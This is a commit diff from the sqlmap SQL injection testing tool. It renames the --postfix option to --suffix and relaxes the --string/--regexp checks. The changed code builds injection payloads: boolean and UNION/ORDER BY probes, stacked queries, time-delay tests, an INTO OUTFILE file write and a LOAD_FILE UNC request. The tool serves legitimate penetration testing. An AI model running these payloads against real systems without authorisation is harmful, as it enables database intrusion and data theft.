mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-22 01:26:42 +03:00
Proper english (--postfix is now --suffix) and --string/--regexp does not necessarily need to match into the original response body, it might well be in the injected True condition only!
This commit is contained in:
parent
ca5125bbe0
commit
17486e472a
|
@ -213,7 +213,7 @@ Gabriel Lima <pato@bugnet.com.br>
|
||||||
for reporting a couple of bugs
|
for reporting a couple of bugs
|
||||||
|
|
||||||
Mark Lowe <larkmowe@gmail.com>
|
Mark Lowe <larkmowe@gmail.com>
|
||||||
for reporting a bug
|
for reporting a couple of bugs
|
||||||
|
|
||||||
Truong Duc Luong <luongductruong@gmail.com>
|
Truong Duc Luong <luongductruong@gmail.com>
|
||||||
for reporting a minor bug
|
for reporting a minor bug
|
||||||
|
|
|
@ -52,15 +52,15 @@ def checkSqlInjection(place, parameter, value, parenthesis):
|
||||||
randInt = randomInt()
|
randInt = randomInt()
|
||||||
randStr = randomStr()
|
randStr = randomStr()
|
||||||
prefix = ""
|
prefix = ""
|
||||||
postfix = ""
|
suffix = ""
|
||||||
retVal = None
|
retVal = None
|
||||||
|
|
||||||
if conf.prefix or conf.postfix:
|
if conf.prefix or conf.suffix:
|
||||||
if conf.prefix:
|
if conf.prefix:
|
||||||
prefix = conf.prefix
|
prefix = conf.prefix
|
||||||
|
|
||||||
if conf.postfix:
|
if conf.suffix:
|
||||||
postfix = conf.postfix
|
suffix = conf.suffix
|
||||||
|
|
||||||
for case in kb.injections.root.case:
|
for case in kb.injections.root.case:
|
||||||
conf.matchRatio = None
|
conf.matchRatio = None
|
||||||
|
@ -68,7 +68,7 @@ def checkSqlInjection(place, parameter, value, parenthesis):
|
||||||
positive = case.test.positive
|
positive = case.test.positive
|
||||||
negative = case.test.negative
|
negative = case.test.negative
|
||||||
|
|
||||||
if not prefix and not postfix and case.name == "custom":
|
if not prefix and not suffix and case.name == "custom":
|
||||||
continue
|
continue
|
||||||
|
|
||||||
infoMsg = "testing %s (%s) injection " % (case.desc, logic)
|
infoMsg = "testing %s (%s) injection " % (case.desc, logic)
|
||||||
|
@ -116,16 +116,16 @@ def heuristicCheckSqlInjection(place, parameter, value):
|
||||||
return
|
return
|
||||||
|
|
||||||
prefix = ""
|
prefix = ""
|
||||||
postfix = ""
|
suffix = ""
|
||||||
|
|
||||||
if conf.prefix or conf.postfix:
|
if conf.prefix or conf.suffix:
|
||||||
if conf.prefix:
|
if conf.prefix:
|
||||||
prefix = conf.prefix
|
prefix = conf.prefix
|
||||||
|
|
||||||
if conf.postfix:
|
if conf.suffix:
|
||||||
postfix = conf.postfix
|
suffix = conf.suffix
|
||||||
|
|
||||||
payload = "%s%s%s%s" % (value, prefix, randomStr(length=10, alphabet=['"', '\'', ')', '(']), postfix)
|
payload = "%s%s%s%s" % (value, prefix, randomStr(length=10, alphabet=['"', '\'', ')', '(']), suffix)
|
||||||
payload = agent.payload(place, parameter, value, payload)
|
payload = agent.payload(place, parameter, value, payload)
|
||||||
Request.queryPage(payload, place, raise404=False)
|
Request.queryPage(payload, place, raise404=False)
|
||||||
result = wasLastRequestDBMSError()
|
result = wasLastRequestDBMSError()
|
||||||
|
@ -209,15 +209,15 @@ def checkDynamicContent(firstPage, secondPage):
|
||||||
|
|
||||||
for i in xrange(len(blocks) - 1):
|
for i in xrange(len(blocks) - 1):
|
||||||
prefix = firstPage[blocks[i][0]:blocks[i][0] + blocks[i][2]] if blocks[i] else None
|
prefix = firstPage[blocks[i][0]:blocks[i][0] + blocks[i][2]] if blocks[i] else None
|
||||||
postfix = firstPage[blocks[i + 1][0]:blocks[i + 1][0] + blocks[i + 1][2]] if blocks[i + 1] else None
|
suffix = firstPage[blocks[i + 1][0]:blocks[i + 1][0] + blocks[i + 1][2]] if blocks[i + 1] else None
|
||||||
|
|
||||||
if prefix is None and blocks[i + 1][0] == 0:
|
if prefix is None and blocks[i + 1][0] == 0:
|
||||||
continue
|
continue
|
||||||
|
|
||||||
if postfix is None and (blocks[i][0] + blocks[i][2] >= len(firstPage)):
|
if suffix is None and (blocks[i][0] + blocks[i][2] >= len(firstPage)):
|
||||||
continue
|
continue
|
||||||
|
|
||||||
kb.dynamicMarkings.append((re.escape(prefix[-conf.dynMarkLength:]) if prefix else None, re.escape(postfix[:conf.dynMarkLength]) if postfix else None))
|
kb.dynamicMarkings.append((re.escape(prefix[-conf.dynMarkLength:]) if prefix else None, re.escape(suffix[:conf.dynMarkLength]) if suffix else None))
|
||||||
|
|
||||||
if len(kb.dynamicMarkings) > 0:
|
if len(kb.dynamicMarkings) > 0:
|
||||||
infoMsg = "dynamic content marked for removal (%d region%s)" % (len(kb.dynamicMarkings), 's' if len(kb.dynamicMarkings) > 1 else '')
|
infoMsg = "dynamic content marked for removal (%d region%s)" % (len(kb.dynamicMarkings), 's' if len(kb.dynamicMarkings) > 1 else '')
|
||||||
|
@ -225,14 +225,14 @@ def checkDynamicContent(firstPage, secondPage):
|
||||||
|
|
||||||
if conf.seqMatcher.a:
|
if conf.seqMatcher.a:
|
||||||
for item in kb.dynamicMarkings:
|
for item in kb.dynamicMarkings:
|
||||||
prefix, postfix = item
|
prefix, suffix = item
|
||||||
|
|
||||||
if prefix is None:
|
if prefix is None:
|
||||||
conf.seqMatcher.a = re.sub('(?s)^.+%s' % postfix, postfix, conf.seqMatcher.a)
|
conf.seqMatcher.a = re.sub('(?s)^.+%s' % suffix, suffix, conf.seqMatcher.a)
|
||||||
elif postfix is None:
|
elif suffix is None:
|
||||||
conf.seqMatcher.a = re.sub('(?s)%s.+$' % prefix, prefix, conf.seqMatcher.a)
|
conf.seqMatcher.a = re.sub('(?s)%s.+$' % prefix, prefix, conf.seqMatcher.a)
|
||||||
else:
|
else:
|
||||||
conf.seqMatcher.a = re.sub('(?s)%s.+%s' % (prefix, postfix), '%s%s' % (prefix, postfix), conf.seqMatcher.a)
|
conf.seqMatcher.a = re.sub('(?s)%s.+%s' % (prefix, suffix), '%s%s' % (prefix, suffix), conf.seqMatcher.a)
|
||||||
|
|
||||||
def checkStability():
|
def checkStability():
|
||||||
"""
|
"""
|
||||||
|
@ -347,14 +347,14 @@ def checkString():
|
||||||
|
|
||||||
if conf.string in page:
|
if conf.string in page:
|
||||||
setString()
|
setString()
|
||||||
return True
|
|
||||||
else:
|
else:
|
||||||
errMsg = "you provided '%s' as the string to " % conf.string
|
warnMsg = "you provided '%s' as the string to " % conf.string
|
||||||
errMsg += "match, but such a string is not within the target "
|
warnMsg += "match, but such a string is not within the target "
|
||||||
errMsg += "URL page content, please provide another string."
|
warnMsg += "URL page content original request, sqlmap will "
|
||||||
logger.error(errMsg)
|
warnMsg += "keep going anyway"
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
return False
|
return True
|
||||||
|
|
||||||
def checkRegexp():
|
def checkRegexp():
|
||||||
if not conf.regexp:
|
if not conf.regexp:
|
||||||
|
@ -377,15 +377,14 @@ def checkRegexp():
|
||||||
|
|
||||||
if re.search(conf.regexp, page, re.I | re.M):
|
if re.search(conf.regexp, page, re.I | re.M):
|
||||||
setRegexp()
|
setRegexp()
|
||||||
return True
|
|
||||||
else:
|
else:
|
||||||
errMsg = "you provided '%s' as the regular expression to " % conf.regexp
|
warnMsg = "you provided '%s' as the regular expression to " % conf.regexp
|
||||||
errMsg += "match, but such a regular expression does not have any "
|
warnMsg += "match, but such a regular expression does not have any "
|
||||||
errMsg += "match within the target URL page content, please provide "
|
warnMsg += "match within the target URL page content, sqlmap "
|
||||||
errMsg += "another regular expression."
|
warnMsg += "will keep going anyway"
|
||||||
logger.error(errMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
return False
|
return True
|
||||||
|
|
||||||
def checkNullConnection():
|
def checkNullConnection():
|
||||||
"""
|
"""
|
||||||
|
|
|
@ -120,7 +120,7 @@ class Agent:
|
||||||
return self.payloadDirect(query)
|
return self.payloadDirect(query)
|
||||||
|
|
||||||
query = self.prefixQuery(query)
|
query = self.prefixQuery(query)
|
||||||
query = self.postfixQuery(query)
|
query = self.suffixQuery(query)
|
||||||
payload = self.payload(newValue=query)
|
payload = self.payload(newValue=query)
|
||||||
|
|
||||||
return payload
|
return payload
|
||||||
|
@ -156,7 +156,7 @@ class Agent:
|
||||||
|
|
||||||
return query
|
return query
|
||||||
|
|
||||||
def postfixQuery(self, string, comment=None):
|
def suffixQuery(self, string, comment=None):
|
||||||
"""
|
"""
|
||||||
This method appends the DBMS comment to the
|
This method appends the DBMS comment to the
|
||||||
SQL injection request
|
SQL injection request
|
||||||
|
@ -182,10 +182,10 @@ class Agent:
|
||||||
if comment:
|
if comment:
|
||||||
string += comment
|
string += comment
|
||||||
|
|
||||||
if conf.postfix:
|
if conf.suffix:
|
||||||
string += " %s" % conf.postfix
|
string += " %s" % conf.suffix
|
||||||
else:
|
else:
|
||||||
string += case.usage.postfix.format % eval(case.usage.postfix.params)
|
string += case.usage.suffix.format % eval(case.usage.suffix.params)
|
||||||
|
|
||||||
return string
|
return string
|
||||||
|
|
||||||
|
@ -499,7 +499,7 @@ class Agent:
|
||||||
if intoRegExp:
|
if intoRegExp:
|
||||||
inbandQuery += intoRegExp
|
inbandQuery += intoRegExp
|
||||||
|
|
||||||
inbandQuery = self.postfixQuery(inbandQuery, kb.unionComment)
|
inbandQuery = self.suffixQuery(inbandQuery, kb.unionComment)
|
||||||
|
|
||||||
return inbandQuery
|
return inbandQuery
|
||||||
|
|
||||||
|
@ -636,7 +636,7 @@ class Agent:
|
||||||
regObj = getCompiledRegex("(?P<result>%s.*?%s)" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER))
|
regObj = getCompiledRegex("(?P<result>%s.*?%s)" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER))
|
||||||
|
|
||||||
for match in regObj.finditer(inpStr):
|
for match in regObj.finditer(inpStr):
|
||||||
retVal = retVal.replace(match.group("result"), urlencode(match.group("result").strip(PAYLOAD_DELIMITER), convall=True))
|
retVal = retVal.replace(match.group("result"), match.group("result").strip(PAYLOAD_DELIMITER))
|
||||||
else:
|
else:
|
||||||
retVal = retVal.replace(PAYLOAD_DELIMITER, '')
|
retVal = retVal.replace(PAYLOAD_DELIMITER, '')
|
||||||
|
|
||||||
|
|
|
@ -58,7 +58,7 @@ optDict = {
|
||||||
"dbms": "string",
|
"dbms": "string",
|
||||||
"os": "string",
|
"os": "string",
|
||||||
"prefix": "string",
|
"prefix": "string",
|
||||||
"postfix": "string",
|
"suffix": "string",
|
||||||
"tamper": "string"
|
"tamper": "string"
|
||||||
},
|
},
|
||||||
|
|
||||||
|
|
|
@ -169,8 +169,8 @@ def cmdLineParser():
|
||||||
injection.add_option("--prefix", dest="prefix",
|
injection.add_option("--prefix", dest="prefix",
|
||||||
help="Injection payload prefix string")
|
help="Injection payload prefix string")
|
||||||
|
|
||||||
injection.add_option("--postfix", dest="postfix",
|
injection.add_option("--suffix", dest="suffix",
|
||||||
help="Injection payload postfix string")
|
help="Injection payload suffix string")
|
||||||
|
|
||||||
injection.add_option("--tamper", dest="tamper",
|
injection.add_option("--tamper", dest="tamper",
|
||||||
help="Use given script(s) for tampering injection data")
|
help="Use given script(s) for tampering injection data")
|
||||||
|
|
|
@ -60,14 +60,14 @@ def comparison(page, headers=None, getSeqMatcher=False, pageLength=None):
|
||||||
# Dynamic content lines to be excluded before comparison
|
# Dynamic content lines to be excluded before comparison
|
||||||
if not kb.nullConnection and not conf.longestCommon:
|
if not kb.nullConnection and not conf.longestCommon:
|
||||||
for item in kb.dynamicMarkings:
|
for item in kb.dynamicMarkings:
|
||||||
prefix, postfix = item
|
prefix, suffix = item
|
||||||
|
|
||||||
if prefix is None:
|
if prefix is None:
|
||||||
page = re.sub('(?s)^.+%s' % postfix, postfix, page)
|
page = re.sub('(?s)^.+%s' % suffix, suffix, page)
|
||||||
elif postfix is None:
|
elif suffix is None:
|
||||||
page = re.sub('(?s)%s.+$' % prefix, prefix, page)
|
page = re.sub('(?s)%s.+$' % prefix, prefix, page)
|
||||||
else:
|
else:
|
||||||
page = re.sub('(?s)%s.+%s' % (prefix, postfix), '%s%s' % (prefix, postfix), page)
|
page = re.sub('(?s)%s.+%s' % (prefix, suffix), '%s%s' % (prefix, suffix), page)
|
||||||
|
|
||||||
if not pageLength:
|
if not pageLength:
|
||||||
pageLength = len(page)
|
pageLength = len(page)
|
||||||
|
|
|
@ -99,7 +99,7 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r
|
||||||
"""
|
"""
|
||||||
|
|
||||||
query = agent.prefixQuery(queries[kb.misc.testedDbms].inference.query)
|
query = agent.prefixQuery(queries[kb.misc.testedDbms].inference.query)
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
count = None
|
count = None
|
||||||
startLimit = 0
|
startLimit = 0
|
||||||
|
@ -398,7 +398,7 @@ def goStacked(expression, silent=False):
|
||||||
|
|
||||||
comment = queries[kb.dbms].comment.query
|
comment = queries[kb.dbms].comment.query
|
||||||
query = agent.prefixQuery("; %s" % expression)
|
query = agent.prefixQuery("; %s" % expression)
|
||||||
query = agent.postfixQuery("%s;%s" % (query, comment))
|
query = agent.suffixQuery("%s;%s" % (query, comment))
|
||||||
|
|
||||||
debugMsg = "query: %s" % query
|
debugMsg = "query: %s" % query
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
|
@ -99,7 +99,7 @@ class Web:
|
||||||
query = "LIMIT 1 INTO OUTFILE '%s' " % outFile
|
query = "LIMIT 1 INTO OUTFILE '%s' " % outFile
|
||||||
query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)
|
query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)
|
||||||
query = agent.prefixQuery(query)
|
query = agent.prefixQuery(query)
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
page = Request.queryPage(payload)
|
page = Request.queryPage(payload)
|
||||||
return page
|
return page
|
||||||
|
|
|
@ -442,7 +442,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||||
# One-shot query containing equals commonValue
|
# One-shot query containing equals commonValue
|
||||||
testValue = unescaper.unescape("'%s'" % commonValue) if "'" not in commonValue else unescaper.unescape("%s" % commonValue, quote=False)
|
testValue = unescaper.unescape("'%s'" % commonValue) if "'" not in commonValue else unescaper.unescape("%s" % commonValue, quote=False)
|
||||||
query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (expressionUnescaped, testValue)))
|
query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (expressionUnescaped, testValue)))
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
queriesCount[0] += 1
|
queriesCount[0] += 1
|
||||||
result = Request.queryPage(agent.payload(newValue=query))
|
result = Request.queryPage(agent.payload(newValue=query))
|
||||||
|
|
||||||
|
@ -466,7 +466,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||||
subquery = queries[kb.dbms].substring.query % (expressionUnescaped, 1, len(commonPattern))
|
subquery = queries[kb.dbms].substring.query % (expressionUnescaped, 1, len(commonPattern))
|
||||||
testValue = unescaper.unescape("'%s'" % commonPattern) if "'" not in commonPattern else unescaper.unescape("%s" % commonPattern, quote=False)
|
testValue = unescaper.unescape("'%s'" % commonPattern) if "'" not in commonPattern else unescaper.unescape("%s" % commonPattern, quote=False)
|
||||||
query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (subquery, testValue)))
|
query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (subquery, testValue)))
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
queriesCount[0] += 1
|
queriesCount[0] += 1
|
||||||
result = Request.queryPage(agent.payload(newValue=query))
|
result = Request.queryPage(agent.payload(newValue=query))
|
||||||
|
|
||||||
|
|
|
@ -28,7 +28,7 @@ def timeTest():
|
||||||
|
|
||||||
timeQuery = getDelayQuery(andCond=True)
|
timeQuery = getDelayQuery(andCond=True)
|
||||||
query = agent.prefixQuery("AND %s" % timeQuery)
|
query = agent.prefixQuery("AND %s" % timeQuery)
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
start = time.time()
|
start = time.time()
|
||||||
_ = Request.queryPage(payload)
|
_ = Request.queryPage(payload)
|
||||||
|
|
|
@ -38,7 +38,7 @@ def tableExists(tableFile):
|
||||||
if conf.db and '(*)' not in conf.db:
|
if conf.db and '(*)' not in conf.db:
|
||||||
table = "%s.%s" % (conf.db, table)
|
table = "%s.%s" % (conf.db, table)
|
||||||
query = agent.prefixQuery("%s" % safeStringFormat("AND EXISTS(SELECT %d FROM %s)", (randomInt(1), table)))
|
query = agent.prefixQuery("%s" % safeStringFormat("AND EXISTS(SELECT %d FROM %s)", (randomInt(1), table)))
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
result = Request.queryPage(agent.payload(newValue=query))
|
result = Request.queryPage(agent.payload(newValue=query))
|
||||||
|
|
||||||
if result:
|
if result:
|
||||||
|
@ -89,7 +89,7 @@ def columnExists(columnFile):
|
||||||
|
|
||||||
for column in columns:
|
for column in columns:
|
||||||
query = agent.prefixQuery("%s" % safeStringFormat("AND EXISTS(SELECT %s FROM %s)", (column, table)))
|
query = agent.prefixQuery("%s" % safeStringFormat("AND EXISTS(SELECT %s FROM %s)", (column, table)))
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
result = Request.queryPage(agent.payload(newValue=query))
|
result = Request.queryPage(agent.payload(newValue=query))
|
||||||
|
|
||||||
if result:
|
if result:
|
||||||
|
@ -114,7 +114,7 @@ def columnExists(columnFile):
|
||||||
|
|
||||||
for column in retVal:
|
for column in retVal:
|
||||||
query = agent.prefixQuery("%s" % safeStringFormat("AND EXISTS(SELECT %s FROM %s WHERE %s>0)", (column, table, column)))
|
query = agent.prefixQuery("%s" % safeStringFormat("AND EXISTS(SELECT %s FROM %s WHERE %s>0)", (column, table, column)))
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
result = Request.queryPage(agent.payload(newValue=query))
|
result = Request.queryPage(agent.payload(newValue=query))
|
||||||
|
|
||||||
if result:
|
if result:
|
||||||
|
|
|
@ -40,7 +40,7 @@ def errorUse(expression, returnPayload=False):
|
||||||
logic = conf.logic
|
logic = conf.logic
|
||||||
randInt = randomInt(1)
|
randInt = randomInt(1)
|
||||||
query = agent.prefixQuery(queries[kb.misc.testedDbms].error.query)
|
query = agent.prefixQuery(queries[kb.misc.testedDbms].error.query)
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
startLimiter = ""
|
startLimiter = ""
|
||||||
endLimiter = ""
|
endLimiter = ""
|
||||||
|
|
||||||
|
|
|
@ -128,7 +128,7 @@ def __unionTestByNULLBruteforce(comment, negative=False, falseCond=False):
|
||||||
if kb.dbms == DBMS.ORACLE:
|
if kb.dbms == DBMS.ORACLE:
|
||||||
query += " FROM DUAL"
|
query += " FROM DUAL"
|
||||||
|
|
||||||
commentedQuery = agent.postfixQuery(query, comment)
|
commentedQuery = agent.suffixQuery(query, comment)
|
||||||
payload = agent.payload(newValue=commentedQuery, negative=negative, falseCond=falseCond)
|
payload = agent.payload(newValue=commentedQuery, negative=negative, falseCond=falseCond)
|
||||||
test, seqMatcher = Request.queryPage(payload, getSeqMatcher=True)
|
test, seqMatcher = Request.queryPage(payload, getSeqMatcher=True)
|
||||||
|
|
||||||
|
@ -145,7 +145,7 @@ def __unionTestByOrderBy(comment, negative=False, falseCond=False):
|
||||||
|
|
||||||
for count in range(1, conf.uCols+2):
|
for count in range(1, conf.uCols+2):
|
||||||
query = agent.prefixQuery("ORDER BY %d" % count)
|
query = agent.prefixQuery("ORDER BY %d" % count)
|
||||||
orderByQuery = agent.postfixQuery(query, comment)
|
orderByQuery = agent.suffixQuery(query, comment)
|
||||||
payload = agent.payload(newValue=orderByQuery, negative=negative, falseCond=falseCond)
|
payload = agent.payload(newValue=orderByQuery, negative=negative, falseCond=falseCond)
|
||||||
_, seqMatcher = Request.queryPage(payload, getSeqMatcher=True)
|
_, seqMatcher = Request.queryPage(payload, getSeqMatcher=True)
|
||||||
|
|
||||||
|
|
|
@ -37,7 +37,7 @@ def checkForParenthesis():
|
||||||
if kb.parenthesis is not None:
|
if kb.parenthesis is not None:
|
||||||
return
|
return
|
||||||
|
|
||||||
if conf.prefix or conf.postfix:
|
if conf.prefix or conf.suffix:
|
||||||
kb.parenthesis = 0
|
kb.parenthesis = 0
|
||||||
return
|
return
|
||||||
|
|
||||||
|
@ -46,7 +46,7 @@ def checkForParenthesis():
|
||||||
randStr = randomStr()
|
randStr = randomStr()
|
||||||
|
|
||||||
query = case.usage.prefix.format % eval(case.usage.prefix.params)
|
query = case.usage.prefix.format % eval(case.usage.prefix.params)
|
||||||
query = query[:-1] + case.usage.postfix.format % eval(case.usage.postfix.params)
|
query = query[:-1] + case.usage.suffix.format % eval(case.usage.suffix.params)
|
||||||
|
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
result = Request.queryPage(payload)
|
result = Request.queryPage(payload)
|
||||||
|
|
|
@ -41,7 +41,7 @@ class Fingerprint(GenericFingerprint):
|
||||||
table = "MSysAccessStorage"
|
table = "MSysAccessStorage"
|
||||||
if table:
|
if table:
|
||||||
query = agent.prefixQuery("AND EXISTS(SELECT CURDIR() FROM %s)" % table)
|
query = agent.prefixQuery("AND EXISTS(SELECT CURDIR() FROM %s)" % table)
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
result = Request.queryPage(payload)
|
result = Request.queryPage(payload)
|
||||||
retVal = "not sandboxed" if result else "sandboxed"
|
retVal = "not sandboxed" if result else "sandboxed"
|
||||||
|
@ -71,7 +71,7 @@ class Fingerprint(GenericFingerprint):
|
||||||
table = table[1:]
|
table = table[1:]
|
||||||
randInt = randomInt()
|
randInt = randomInt()
|
||||||
query = agent.prefixQuery("AND EXISTS(SELECT * FROM %s WHERE %d=%d)" % (table, randInt, randInt))
|
query = agent.prefixQuery("AND EXISTS(SELECT * FROM %s WHERE %d=%d)" % (table, randInt, randInt))
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
result = Request.queryPage(payload)
|
result = Request.queryPage(payload)
|
||||||
if result is None:
|
if result is None:
|
||||||
|
@ -95,7 +95,7 @@ class Fingerprint(GenericFingerprint):
|
||||||
randInt = randomInt()
|
randInt = randomInt()
|
||||||
randStr = randomStr()
|
randStr = randomStr()
|
||||||
query = agent.prefixQuery("AND EXISTS(SELECT * FROM %s.%s WHERE %d=%d)" % (randStr, randStr, randInt, randInt))
|
query = agent.prefixQuery("AND EXISTS(SELECT * FROM %s.%s WHERE %d=%d)" % (randStr, randStr, randInt, randInt))
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
page = Request.queryPage(payload, content=True)
|
page = Request.queryPage(payload, content=True)
|
||||||
|
|
||||||
|
|
|
@ -35,7 +35,7 @@ class Fingerprint(GenericFingerprint):
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
query = agent.prefixQuery("/* NoValue */")
|
query = agent.prefixQuery("/* NoValue */")
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
result = Request.queryPage(payload)
|
result = Request.queryPage(payload)
|
||||||
|
|
||||||
|
@ -49,7 +49,7 @@ class Fingerprint(GenericFingerprint):
|
||||||
|
|
||||||
for version in [6, 7]:
|
for version in [6, 7]:
|
||||||
query = agent.prefixQuery("AND (SELECT MAJORVERSION FROM SYSINFO.VERSION)=%d" % version)
|
query = agent.prefixQuery("AND (SELECT MAJORVERSION FROM SYSINFO.VERSION)=%d" % version)
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
result = Request.queryPage(payload)
|
result = Request.queryPage(payload)
|
||||||
|
|
||||||
|
@ -58,7 +58,7 @@ class Fingerprint(GenericFingerprint):
|
||||||
|
|
||||||
for version in xrange(0, 10):
|
for version in xrange(0, 10):
|
||||||
query = agent.prefixQuery("AND (SELECT MINORVERSION FROM SYSINFO.VERSION)=%d" % version)
|
query = agent.prefixQuery("AND (SELECT MINORVERSION FROM SYSINFO.VERSION)=%d" % version)
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
result = Request.queryPage(payload)
|
result = Request.queryPage(payload)
|
||||||
|
|
||||||
|
|
|
@ -36,7 +36,7 @@ class Fingerprint(GenericFingerprint):
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
query = agent.prefixQuery("/* NoValue */")
|
query = agent.prefixQuery("/* NoValue */")
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
result = Request.queryPage(payload)
|
result = Request.queryPage(payload)
|
||||||
|
|
||||||
|
@ -66,7 +66,7 @@ class Fingerprint(GenericFingerprint):
|
||||||
randInt = randomInt()
|
randInt = randomInt()
|
||||||
version = getUnicode(version)
|
version = getUnicode(version)
|
||||||
query = agent.prefixQuery("/*!%s AND %d=%d*/" % (version, randInt, randInt + 1))
|
query = agent.prefixQuery("/*!%s AND %d=%d*/" % (version, randInt, randInt + 1))
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
result = Request.queryPage(payload)
|
result = Request.queryPage(payload)
|
||||||
|
|
||||||
|
|
|
@ -102,7 +102,7 @@ class Takeover(GenericTakeover):
|
||||||
def uncPathRequest(self):
|
def uncPathRequest(self):
|
||||||
if not kb.stackedTest:
|
if not kb.stackedTest:
|
||||||
query = agent.prefixQuery("AND LOAD_FILE('%s')" % self.uncPath)
|
query = agent.prefixQuery("AND LOAD_FILE('%s')" % self.uncPath)
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
|
|
||||||
Request.queryPage(payload)
|
Request.queryPage(payload)
|
||||||
|
|
|
@ -181,8 +181,8 @@ os =
|
||||||
# Injection payload prefix string
|
# Injection payload prefix string
|
||||||
prefix =
|
prefix =
|
||||||
|
|
||||||
# Injection payload postfix string
|
# Injection payload suffix string
|
||||||
postfix =
|
suffix =
|
||||||
|
|
||||||
# Use given script(s) for tampering injection data
|
# Use given script(s) for tampering injection data
|
||||||
tamper =
|
tamper =
|
||||||
|
|
|
@ -3,12 +3,12 @@
|
||||||
<root>
|
<root>
|
||||||
<case name="custom" desc="custom">
|
<case name="custom" desc="custom">
|
||||||
<test>
|
<test>
|
||||||
<positive format="%s%s%s %s %s%d=%d %s" params="value, prefix, ")" * parenthesis, logic, "(" * parenthesis, randInt, randInt, postfix"/>
|
<positive format="%s%s%s %s %s%d=%d %s" params="value, prefix, ")" * parenthesis, logic, "(" * parenthesis, randInt, randInt, suffix"/>
|
||||||
<negative format="%s%s%s %s %s%d=%d %s" params="value, prefix, ")" * parenthesis, logic, "(" * parenthesis, randInt, randInt + 1, postfix"/>
|
<negative format="%s%s%s %s %s%d=%d %s" params="value, prefix, ")" * parenthesis, logic, "(" * parenthesis, randInt, randInt + 1, suffix"/>
|
||||||
</test>
|
</test>
|
||||||
<usage>
|
<usage>
|
||||||
<prefix format="%s " params="')' * parenthesis"/>
|
<prefix format="%s " params="')' * parenthesis"/>
|
||||||
<postfix format=" %s %s" params="logic, '(' * parenthesis"/>
|
<suffix format=" %s %s" params="logic, '(' * parenthesis"/>
|
||||||
</usage>
|
</usage>
|
||||||
</case>
|
</case>
|
||||||
<case name="numeric" desc="unescaped numeric">
|
<case name="numeric" desc="unescaped numeric">
|
||||||
|
@ -18,7 +18,7 @@
|
||||||
</test>
|
</test>
|
||||||
<usage>
|
<usage>
|
||||||
<prefix format="%s " params="')' * parenthesis"/>
|
<prefix format="%s " params="')' * parenthesis"/>
|
||||||
<postfix format=" %s %s%d=%d" params="logic, '(' * parenthesis, randInt, randInt"/>
|
<suffix format=" %s %s%d=%d" params="logic, '(' * parenthesis, randInt, randInt"/>
|
||||||
</usage>
|
</usage>
|
||||||
</case>
|
</case>
|
||||||
<case name="stringsingle" desc="single quoted string">
|
<case name="stringsingle" desc="single quoted string">
|
||||||
|
@ -28,7 +28,7 @@
|
||||||
</test>
|
</test>
|
||||||
<usage>
|
<usage>
|
||||||
<prefix format="'%s " params="')' * parenthesis"/>
|
<prefix format="'%s " params="')' * parenthesis"/>
|
||||||
<postfix format=" %s %s'%s'='%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
<suffix format=" %s %s'%s'='%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
||||||
</usage>
|
</usage>
|
||||||
